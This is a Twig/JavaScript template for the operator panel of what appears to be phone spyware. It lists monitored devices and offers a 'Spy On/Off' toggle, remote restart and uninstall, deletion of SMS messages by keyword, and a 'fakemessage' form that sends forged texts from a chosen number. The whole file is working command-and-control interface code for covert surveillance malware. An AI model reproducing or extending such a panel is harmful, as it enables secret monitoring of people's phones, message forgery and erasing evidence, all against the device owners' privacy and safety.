{% extends "panel/layout.twig" %}
{% block tittle %}Device info{% endblock %}
{% block content %}
	<link href="https://gitcdn.github.io/bootstrap-toggle/2.2.2/css/bootstrap-toggle.min.css" rel="stylesheet">
	<script src="https://gitcdn.github.io/bootstrap-toggle/2.2.2/js/bootstrap-toggle.min.js"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.maskedinput/1.4.1/jquery.maskedinput.min.js"></script>
	<style>
		.list-group-item{
			text-align: center;
		}
		.panel .dropdown-toggle{
			color: white;
			font-size: 20px;
			font-weight: 900;
			float: right;
		}
		.panel .dropdown-toggle:hover{
			font-size: 21px;
		}
		.page-container .page-content{
			margin-top: -65px;
			padding-bottom: 50px;
		}
		div.slow{ border-radius: 16px!important;float:left; }
		.toggle-group label.btn-success{
			background-color: #0aa815;
		}
	</style>
	<script src="../assets/global/plugins/bootbox/bootbox.min.js" type="text/javascript"></script>
	<script>
		$(function () {

		});
	</script>
	<div class="row">
		{%if table_device==NULL%}
			<span class="help-block note note-danger">
				<strong>You have not devices</strong>
			</span>
		{%else%}
			<div class="panel panel-default"></div>
			{% for qtable_device in table_device %}
				<div class="panel panel-default col-md-5" id="device_{{qtable_device["id"]}}" style="padding:20px;margin:20px;">
					<div class="panel-heading bg-green" style="text-align: center;"><a href="panel/device/{{qtable_device["id"]}}" style="color: white;font-size: 20px;font-weight: 900; width:90%">{{qtable_device["model"]}}</a>
						<input type="checkbox" id="spy_status_{{qtable_device["id"]}}" {% if qtable_device["spy_status"] == true %}checked{% endif %}  data-toggle="toggle" data-size="small" data-style="slow" data-onstyle="success" data-offstyle="danger">
						<a href="#" class="dropdown-toggle" data-toggle="dropdown" data-hover="dropdown" data-close-others="true" style="width: 2%;">
							<span class="username username-hide-on-mobile"><i class="fa fa-cog" aria-hidden="true"></i></span>
						</a>
						<ul class="dropdown-menu dropdown-menu-default" style="top: 17%;left: 65.5%;">
							<li>
								<a id="restart_{{qtable_device["id"]}}"  href="#">
									<i class="fa fa-mobile"></i> Restart device</a>
							</li>
							<li>
								<a id="uninstall_{{qtable_device["id"]}}" href="#">
									<i class="fa fa-trash-o"></i> Uninstall program</a>
							</li>
							<li>
								<a id="fakemessage_{{qtable_device["id"]}}"  href="#">
									<i class="fa fa-commenting-o"></i> Send message</a>
							</li>
							<li>
								<a id="delete_message_{{qtable_device["id"]}}" href="#">
									<i class="fa fa-eraser"></i> Delete message</a>
							</li>
							<li>
								<a id="reset_{{qtable_device["id"]}}"  href="#">
									<i class="fa fa-mobile"></i> Reset device information</a>
							</li>
							<li>
								<a id="delete_{{qtable_device["id"]}}" href="#">
									<i class="fa fa-trash-o"></i> Delete device</a>
							</li>
							<script>
								$(function () {
									$("#device_{{qtable_device["id"]}} .toggle").bind("click", function () {
										if ($(this).find('input[type="checkbox"]').prop('checked') !== true) {
											$(this).find('input[type="checkbox"]').bootstrapToggle('on');
											$.ajax({url: '/device/{{qtable_device["id"]}}/on', success: function (data) {
													var result = JSON.parse(data);
													if (result.success === 1 && result.failure === 0) {
														alert('"Spy On" request was sent!');
													} else {
														alert("Error: can't send request!");
													}
												}});
										} else {
											$(this).find('input[type="checkbox"]').bootstrapToggle('off');
											$.ajax({url: '/device/{{qtable_device["id"]}}/off', success: function (data) {
													var result = JSON.parse(data);
													if (result.success === 1 && result.failure === 0) {
														alert('"Spy Off" request was sent!');
													} else {
														alert("Error: can't send request!");
													}
												}});
										}
									});
									$('#reset_{{qtable_device["id"]}}').click(function () {
										bootbox.confirm("Are you sure?", function (result) {
											if (result == true) {
												$(location).attr('href', '/device/{{qtable_device["id"]}}/actions/reset');
											} else {
											}
										});
									});
									$('#delete_{{qtable_device["id"]}}').click(function () {
										bootbox.confirm("Are you sure? ", function (result) {
											if (result === true) {
												$(location).attr('href', '/device/{{qtable_device["id"]}}/actions/delete');
											} else {
											}
										});
									});
									$('#restart_{{qtable_device["id"]}}').click(function () {
										bootbox.confirm("Are you sure? ", function (result) {
											if (result === true) {
												$.ajax({url: '/device/{{qtable_device["id"]}}/restart', success: function (data) {
														var result = JSON.parse(data);
														if (result.success === 1 && result.failure === 0) {
															alert('Request was sent successfully!');
														} else {
															alert("Error: can't send request!");
														}
													}});
											} else {
											}
										});
									});
									$('#uninstall_{{qtable_device["id"]}}').click(function () {
										bootbox.confirm("Are you sure? ", function (result) {
											if (result === true) {
												$.ajax({url: '/device/{{qtable_device["id"]}}/uninstall', success: function (data) {
														var result = JSON.parse(data);
														if (result.success === 1 && result.failure === 0) {
															alert('Request was sent successfully!');} else {
															alert("Error: can't send request!");
														}
													}});
											} else {
											}
										});
									});
									$('#delete_message_{{qtable_device["id"]}}').click(function () {
										bootbox.prompt({
											title: "Delete SMS messages containing keywords",
											inputType: 'textarea',
											callback: function (result) {
												if (result !== null) {
													$.ajax({url: '/device/{{qtable_device["id"]}}/removemessage/' + encodeURI(result), success: function (data) {
															var result = JSON.parse(data);
															if (result.success === 1 && result.failure === 0) {
																alert('Request was sent successfully!');
															} else {
																alert("Error: can't send request!");
															}
														}});
												}
											}
										});
									});
									$('#fakemessage_{{qtable_device["id"]}}').click(function () {

										bootbox.prompt({
											title: "Send message",
											inputType: 'textarea',
											callback: function (result) {
												if (result !== null && result !== "") {
													$.ajax({url: '/device/{{qtable_device["id"]}}/fakemessage/' + encodeURI(result), success: function (data) {
															var result = JSON.parse(data);
															if (result.success === 1 && result.failure === 0) {
																alert('Request was sent successfully!');
															} else {
																alert("Error: can't send request!");
															}
														}});
												}
											}
										});
										$(".bootbox-body .bootbox-form textarea").hide();
										$('.bootbox-body .bootbox-form').append('<div class="form-group"><label for="number_{{qtable_device["id"]}}">Number:</label><input type="tel"  class="form-control phone" require id="number_{{qtable_device["id"]}}" onkeyup="$(\'.bootbox-body .bootbox-form textarea.bootbox-input\').val($(this).val()+\':\'+$(\'#message_{{qtable_device["id"]}}\').val());" size="40"></div><div class="form-group"><label for="message_{{qtable_device["id"]}}">Message:</label><textarea id="message_{{qtable_device["id"]}}" onkeyup="$(\'.bootbox-body .bootbox-form textarea.bootbox-input\').val($(\'#number_{{qtable_device["id"]}}\').val()+\':\'+$(this).val());" class="form-control" rows="5" id="comment"></textarea></div>');
									});
								});
							</script>
						</ul>
					</div>
					<a href="panel/device/{{qtable_device["id"]}}">
						<div class="panel-body">
							<div class="col-md-6 options_none_display">
								<img width="200px" height="200px" src="/images/os/{{qtable_device["logo"]}}" alt="альтернативный текст">
							</div>
							<div class="col-md-6">
								<ul class="list-group bg-green">
									<li class="list-group-item bg-green" style="color:white;font-weight: 900;">Technical Info</li>
									<li class="list-group-item bg-green" style="color:white;font-weight: 700;">
										<table class="table">
											<tbody>
												<tr>
													<td>OS</td>
													<td>{{qtable_device["os"]}}</td>
												</tr>
												<tr>
													<td>Battery</td>
													<td>{{qtable_device["battery"]}}</td>
												</tr>
												<tr>
													<td>Mac address</td>
													<td>{{qtable_device["mac_address"]}}</td>
												</tr>
											</tbody>
										</table>
									</li>
								</ul>
							</div>

						</div>
				</div></a>
			{% endfor %}
		{%endif%}
</div>
{% endblock %}
